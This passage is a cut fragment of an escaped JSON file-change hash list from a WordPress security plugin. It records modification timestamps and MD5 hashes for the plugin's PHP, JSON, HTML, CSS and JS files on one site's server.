bd807de2120d237da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/static-map-api\\/index.php\":{\"d\":1545735239,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/static-map-api\\/interface-itsec-static-map-api.php\":{\"d\":1545735239,\"h\":\"5f658d685f4199a5c0802d6344bc58e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/date.php\":{\"d\":1545735239,\"h\":\"d6a64fa98e47b4de2e2b1daf403ffab7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-male_names.json\":{\"d\":1545735239,\"h\":\"eb51073fa15d848c2baec964c1018783\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/repeat.php\":{\"d\":1545735239,\"h\":\"3636f4fae786dadbe04978747bec1d62\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-english_wikipedia.json\":{\"d\":1545735242,\"h\":\"42fa73aa92a406b9efbf592670b82e68\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/adjacency_graphs.json\":{\"d\":1545735242,\"h\":\"8356304eeac40cad828d60541d6db56d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/spatial.php\":{\"d\":1545735242,\"h\":\"4d8742098890a1eb01fa11725e7b8447\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-passwords.json\":{\"d\":1545735242,\"h\":\"33489e40438216c322e39d5a94dbcf8f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-us_tv_and_film.json\":{\"d\":1545735242,\"h\":\"5bd1dedf66e3c399e34fcde3c84d9a15\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/bruteforce.php\":{\"d\":1545735242,\"h\":\"8392275eab9b12ee882735d31b87742f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-female_names.json\":{\"d\":1545735242,\"h\":\"02e3637d6b2ae4d274b04143f848f7ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/sequence.php\":{\"d\":1545735242,\"h\":\"fe4372758f485830201f90555da65a26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/dictionary.php\":{\"d\":1545735242,\"h\":\"c3bf1ed7775f3cf139d0fcad1938b116\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/dictionary-l33t.php\":{\"d\":1545735242,\"h\":\"cc1528101249e33ae18939affd99c927\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-surnames.json\":{\"d\":1545735242,\"h\":\"1969159e260d1803c60221435efefab3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/dictionary-reverse.php\":{\"d\":1545735242,\"h\":\"d9d71e3fbb263c05acb8ec15288cba70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/regex.php\":{\"d\":1545735242,\"h\":\"76c62680768549048c6547dac48baf27\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/results.php\":{\"d\":1545735239,\"h\":\"e6c561d67a5014d00c29bceb19be0865\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/scorer.php\":{\"d\":1545735239,\"h\":\"fff34c2fa72523baa0726e43f9f4aa33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/zxcvbn.php\":{\"d\":1545735239,\"h\":\"aec159ed25a823e204be65376cb3c120\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/index.php\":{\"d\":1545735239,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/readme.md\":{\"d\":1545735239,\"h\":\"9665a459a076a1053789f9e1afd972ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matcher.php\":{\"d\":1545735239,\"h\":\"84af90d45b02b4aebb56b6daa5365005\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/large-text.html\":{\"d\":1545735242,\"h\":\"5a4dc96788f99f88eacd66ddfc62b310\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/lockouts-entry.html\":{\"d\":1545735242,\"h\":\"81f35669878e14712e0652cf90d8c8aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/info-box.html\":{\"d\":1545735242,\"h\":\"23903a8c611903092cc8cf5b0b7a4a72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/header.html\":{\"d\":1545735242,\"h\":\"9d81d23f947c37c44aaedb9af4def7d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/table.html\":{\"d\":1545735242,\"h\":\"0257463467c95bc293aa71d7b976b9f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/image.html\":{\"d\":1545735242,\"h\":\"727c2ab8445366eada333938b9b8fd66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/text.html\":{\"d\":1545735242,\"h\":\"f4bf5c3e72a3f8c0c142cf281126b6f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/section-heading.html\":{\"d\":1545735242,\"h\":\"9f0e33bbc4571a7caace3c0d4bd9a049\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/footer.html\":{\"d\":1545735242,\"h\":\"6f3ab1bb76e7bad9dfd7144856909278\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/lockouts-summary.html\":{\"d\":1545735242,\"h\":\"1861c83efba5d5e96273fbd403eff606\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/details-box.html\":{\"d\":1545735242,\"h\":\"c58288b0f79eed865b00c4477fa5f25d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/footer-user.html\":{\"d\":1545735242,\"h\":\"4f69983ce07aba852bd3c0b60fd6781b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/divider.html\":{\"d\":1545735242,\"h\":\"56d698965e32b1e20e61ec781e5b84db\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/section-heading-with-icon.html\":{\"d\":1545735242,\"h\":\"a8486ad2b295282cda99ec24a55a61ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/large-code.html\":{\"d\":1545735242,\"h\":\"f99de5743ed24f094e1b54a74d309438\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/file-change-summary.html\":{\"d\":1545735242,\"h\":\"452ab5797dcbb0b96c0d1be4bbd050fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/lockouts-table.html\":{\"d\":1545735242,\"h\":\"c85227219128a839dd1d56f12bdb7aa3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/list.html\":{\"d\":1545735242,\"h\":\"56fc522c192f4b8ccdeef1180307b49b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/pro-callout.html\":{\"d\":1545735242,\"h\":\"0018240aeb1d8c2ff30cb3643d6df1d8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/close.html\":{\"d\":1545735242,\"h\":\"664abb40efe969897f70e2d10947a03d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/module-button.html\":{\"d\":1545735242,\"h\":\"ebdd36052d30576bd9575eb36a769d08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/fingerprinting\\/interface-itsec-fingerprint-source.php\":{\"d\":1545735242,\"h\":\"13ea7a24ef5f1a95f6b6c0f61eb88722\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/fingerprinting\\/class-itsec-fingerprint.php\":{\"d\":1545735242,\"h\":\"e692b872ee0cf26aff5688331603a42b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/fingerprinting\\/class-itsec-fingerprint-value.php\":{\"d\":1545735242,\"h\":\"538fd1a1639a1616bc95810b947029a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/fingerprinting\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/fingerprinting\\/class-itsec-fingerprint-comparison.php\":{\"d\":1545735242,\"h\":\"3211a4e86f4cea1886c66e2aeb07dda1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-scheduler.php\":{\"d\":1545735239,\"h\":\"ff28d44de76b6bebc100f0a8e71a80eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-utility.php\":{\"d\":1545735239,\"h\":\"0ae61a3be6505507ded294f05fc376af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/form.php\":{\"d\":1545735239,\"h\":\"80d2b0fe0906d542697c33f4a4b40e3f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-login-interstitial.php\":{\"d\":1545735239,\"h\":\"e3ba91a1464ad30857d5f830437d317f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/lock.php\":{\"d\":1545735239,\"h\":\"0efe94505ef28ef3c4d7b85b8f8f4f5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-ip-tools.php\":{\"d\":1545735239,\"h\":\"063d67ff83ad8fef9fd338a2ee6b470a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/log-util.php\":{\"d\":1545735239,\"h\":\"56610fde72c02ece9ebada3b99f2ba14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-file.php\":{\"d\":1545735239,\"h\":\"502553cd21d428777122d34a251f27d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-static-map-api.php\":{\"d\":1545735239,\"h\":\"15ff3b0c6a51534ca74bfebb6fec0d5c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/storage.php\":{\"d\":1545735239,\"h\":\"28c03ab301135150e1cf3f7724478521\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-geolocation.php\":{\"d\":1545735239,\"h\":\"7cd31ee145dae54cb6708cee1cfd735a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-job.php\":{\"d\":1545735239,\"h\":\"f9f6d9cc22a0f29e72c60dbcd3245eba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-browser.php\":{\"d\":1545735239,\"h\":\"44f4774f6a4e3fe2e77d808036972611\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-fingerprinting.php\":{\"d\":1545735239,\"h\":\"250438bbeab8f1c1b547fdb2a417dcbc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-distributed-storage.php\":{\"d\":1545735239,\"h\":\"f8ecf1defada512db0c922982c988cf4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-wp-list-table.php\":{\"d\":1545735239,\"h\":\"be5084a368b1958f22bec1f8344e6515\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-directory.php\":{\"d\":1545735239,\"h\":\"27fa45dbb5a6849fe82cd2a8f229f51a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/validator.php\":{\"d\":1545735239,\"h\":\"db68cdcbefde9acc233edc7e7190ae49\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-password-requirements.php\":{\"d\":1545735239,\"h\":\"0e318075ffd07234cf2bef45ae043741\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/index.php\":{\"d\":1545735239,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-scheduler-cron.php\":{\"d\":1545735242,\"h\":\"68e6cf400d06f71c0299228fea4fc6a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/log.php\":{\"d\":1545735242,\"h\":\"0c6038e5c18bc5e5acc786ed85806f85\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-user-activity.php\":{\"d\":1545735242,\"h\":\"b0c9412c752b4ece86343f3149d90cca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-config-file.php\":{\"d\":1545735242,\"h\":\"c9791ef06ea9fd86fd4053980f80a060\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/debug.php\":{\"d\":1545735242,\"h\":\"b56abf9c1132bc142816647a813c82a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-scheduler-page-load.php\":{\"d\":1545735242,\"h\":\"07f02e43303a84ecbf0551dc11141b21\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-canonical-roles.php\":{\"d\":1545735242,\"h\":\"c24a098a2e9417219efc30564b9efb96\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/settings.php\":{\"d\":1545735242,\"h\":\"bc137debec6b5179af513d1c6e52ddf7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-mail.php\":{\"d\":1545735242,\"h\":\"3bb9dd17ff9699d689a8293dd0ef8807\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/schema.php\":{\"d\":1545735242,\"h\":\"15154469a07e6897fa4480b6181f6b37\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/css\\/itsec_notice.css\":{\"d\":1545735242,\"h\":\"947a391c9eef4d20abc01677e5e7ac0a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/css\\/ithemes.css\":{\"d\":1545735242,\"h\":\"bd8a02949ed7e6720d7632381e197c7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/css\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-release-lockout.php\":{\"d\":1545735242,\"h\":\"03fd56ca21de1508a02f926543ea8b4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-set-temp-whitelist.php\":{\"d\":1545735242,\"h\":\"86cf66359e581ae33fa2a9c37c4bf2ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-get-everything.php\":{\"d\":1545735242,\"h\":\"986516639d7832316d83d68fa2f87c7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-get-temp-whitelist.php\":{\"d\":1545735242,\"h\":\"6aabe862828195d0629f2d6b8ef29a7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-get-lockouts.php\":{\"d\":1545735242,\"h\":\"5338b20f3338d8245020bd76013c6d1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-writing\\/settings-page.php\":{\"d\":1545735242,\"h\":\"bfb219aaf38b50641b0b6bee7f0c13e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-writing\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-writing\\/setup.php\":{\"d\":1545735242,\"h\":\"ce407ff5715c837d02b1aba7975bf512\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"02ca6131bffa73e242552a52d75037aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/privacy.php\":{\"d\":1545735242,\"h\":\"498327f5e0b88adae91bcfdcf7ea933c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/utilities.php\":{\"d\":1545735242,\"h\":\"d4f962f5dad5900047cc6798e3fec9e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/class-itsec-ipcheck.php\":{\"d\":1545735242,\"h\":\"a513879b0c8702b23247036af6a01cc6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/settings-page.php\":{\"d\":1545735242,\"h\":\"c66f917a4781ac3a156b8e6e1bb246a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/validator.php\":{\"d\":1545735242,\"h\":\"3ef6b8075c1efc155b6820979854844b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/setup.php\":{\"d\":1545735242,\"h\":\"7d1ed352fd590dce562a5dee9d8f37b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/logs.php\":{\"d\":1545735242,\"h\":\"b1195c21022be28aabe03828021707b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/active.php\":{\"d\":1545735242,\"h\":\"aa0c83580921333d664322b693fa757b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/settings.php\":{\"d\":1545735242,\"h\":\"f7eb6d20cfe18bc4211b604b72aa10dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/css\\/settings-page.css\":{\"d\":1545735242,\"h\":\"df094aa33aa28949d58ae15d0c45bedb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/css\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/css\\/multi-select.css\":{\"d\":1545735242,\"h\":\"8317a4491407795d85521c820897dbff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/img\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"dc37f5da60888ed7305d0648289b8d07\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/js\\/jquery.multi-select.js\":{\"d\":1545735242,\"h\":\"1a0dd3138876ec438b3ff0bb93752209\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/privacy.php\":{\"d\":1545735242,\"h\":\"1a88664ea0990621f961d9ec59d8b212\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/settings-page.php\":{\"d\":1545735242,\"h\":\"6003b48178082c80aef80f2b42931b05\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/class-itsec-backup.php\":{\"d\":1545735242,\"h\":\"4eedc777756df63680729535a1bbaca1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/validator.php\":{\"d\":1545735242,\"h\":\"39fc2e6e08bd7cbf7a5c51c6ffb2b3fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/activate.php\":{\"d\":1545735242,\"h\":\"c40c6c1c00b1843d1854591c4d5403a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/setup.php\":{\"d\":1545735242,\"h\":\"1d325fe91b7e843154acb380c0daa4a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/logs.php\":{\"d\":1545735242,\"h\":\"58bba7018c62b7469cbfb5a1afd7fb33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/backup\\/active.p